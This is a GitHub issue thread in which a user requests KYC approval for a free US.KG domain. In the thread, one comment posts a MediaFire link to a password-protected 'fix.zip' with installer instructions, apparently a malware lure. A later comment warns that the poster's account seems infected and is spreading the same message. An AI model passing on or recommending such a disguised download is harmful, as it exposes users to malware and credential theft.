### ISSUE TITLE
Request GitHub KYC-gulf-repeal-chef@duck.com

### ISSUE THREAD

**Issue by qlqw233** [DigitalPlatDev/US.KG#6281]
### KYC Using Your GitHub Account

We use automated scripts to approve requests. Please make sure your GitHub account meets the following requirements (all are required):

- [x] I have starred this repository.
- [x] The issue title must be: Request GitHub KYC - Your US.KG Panel registered email. This ensures our automated script can detect your registered email.
- [x] This is not a new GitHub account; it has existing repositories and stars.
- [x] This is my first US.KG NIC Panel account.
- [x] I promise not to use the domain name for criminal or abusive purposes.

**Your Account Details (US.KG NIC Panel):**

Please fill out the following information; otherwise, your request will not be processed:

- Username: konijiwa1
- Account Registration Email: gulf-repeal-chef@duck.com
- Reason for Registering the .US.KG Domain Name: I need a free domain name for study.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by remco1271** [comment]
@qlqw233 Did you download the file?
I think you are infected with a virus.
Your account is used to post the same message as WSA1K on other repositories!
See https://github.com/velopack/velopack/issues/205

Please scan your PC on viruses, Change GitHub password and check your personal access tokens
